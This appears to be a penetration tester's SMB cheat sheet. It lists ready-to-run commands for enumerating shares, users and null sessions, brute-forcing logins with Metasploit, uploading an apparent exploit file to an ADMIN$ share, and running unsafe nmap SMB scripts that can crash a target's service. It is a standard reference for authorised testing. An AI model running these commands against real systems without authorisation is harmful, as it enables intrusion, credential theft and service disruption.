
SMB

Find Shares on Network:

./enum4linux-ng.py -a x.x.x.x
nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254
nbtscan -r 192.168.11.0/24
nmblookup -A target
smbclient -L //192.168.1.100
rpcclient -U "" target
smbmap -u "" -p "" -d MYGROUP -H 10.11.1.22

Finding Null Sessions in Windows:

net use \\TARGET\IPC$ "" /u:""

Finding Null Sessions in Linux:

smbclient -L //192.168.99.131
./enum4linux-ng.py -a 192.168.1.1

Enumerating Users:

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

Finding Folders using a login:

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Mount a share

Using smbclient:

smbclient -L //WIN7 -I 192.168.13.218
smbclient '//WIN7/ADMIN$' -I 192.168.13.218
smbclient '//WIN7/C$' -I 192.168.13.218
smbclient '//WIN7/IPC$' -I 192.168.13.218
smbclient //192.168.13.236/some-share -U root%root -W BOB

Using mount:

apt-get install cifs-utils
mount -t cifs //10.11.6.31/wwwroot -o username=xxx,password=xxx /tmp/smb/
mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP

Windows:

C:\WINDOWS\system32> dir \\Computer_name\wwwroot
net use X: \\<server>\<sharename> <password> /USER:<domain>\<username> /PERSISTENT:YES

Metasploit

SMB UID lookup:

msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_lookupsid) > run
[*] 192.168.31.142:139    - PIPE(LSARPC) LOCAL(MYGROUP - 5-21-4157223341-3243572438-1405127623) DOMAIN(MYGROUP - )
[*] 192.168.31.142:139    - TYPE=0 NAME=Administrator rid=500

Getting SMB version:

msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.31.142:139    - Host could not be identified: Unix (Samba 2.2.1a)

SMB brute force:

msf auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login
msf auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_login) > run

Upload a File with SMB

smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"

NMAP SMB scripts

bridings@lupin:/usr/share/nmap/scripts
>>> ls smb* 
smb2-capabilities.nse           smb-protocols.nse
smb2-security-mode.nse          smb-psexec.nse
smb2-time.nse                   smb-security-mode.nse
smb2-vuln-uptime.nse            smb-server-stats.nse
smb-brute.nse                   smb-system-info.nse
smb-double-pulsar-backdoor.nse  smb-vuln-conficker.nse
smb-enum-domains.nse            smb-vuln-cve2009-3103.nse
smb-enum-groups.nse             smb-vuln-cve-2017-7494.nse
smb-enum-processes.nse          smb-vuln-ms06-025.nse
smb-enum-services.nse           smb-vuln-ms07-029.nse
smb-enum-sessions.nse           smb-vuln-ms08-067.nse
smb-enum-shares.nse             smb-vuln-ms10-054.nse
smb-enum-users.nse              smb-vuln-ms10-061.nse
smb-flood.nse                   smb-vuln-ms17-010.nse
smb-ls.nse                      smb-vuln-regsvc-dos.nse
smb-mbenum.nse                  smb-vuln-webexec.nse
smb-os-discovery.nse            smb-webexec-exploit.nse
smb-print-text.nse
>>> nmap --script 'smb-*' --script-args=unsafe=1 192.168.10.55

Quote the script pattern so the shell does not expand it against the .nse files in the current directory. unsafe=1 lets scripts flagged as unsafe (smb-flood and several smb-vuln-* checks) run, and those can crash or hang the target's SMB service.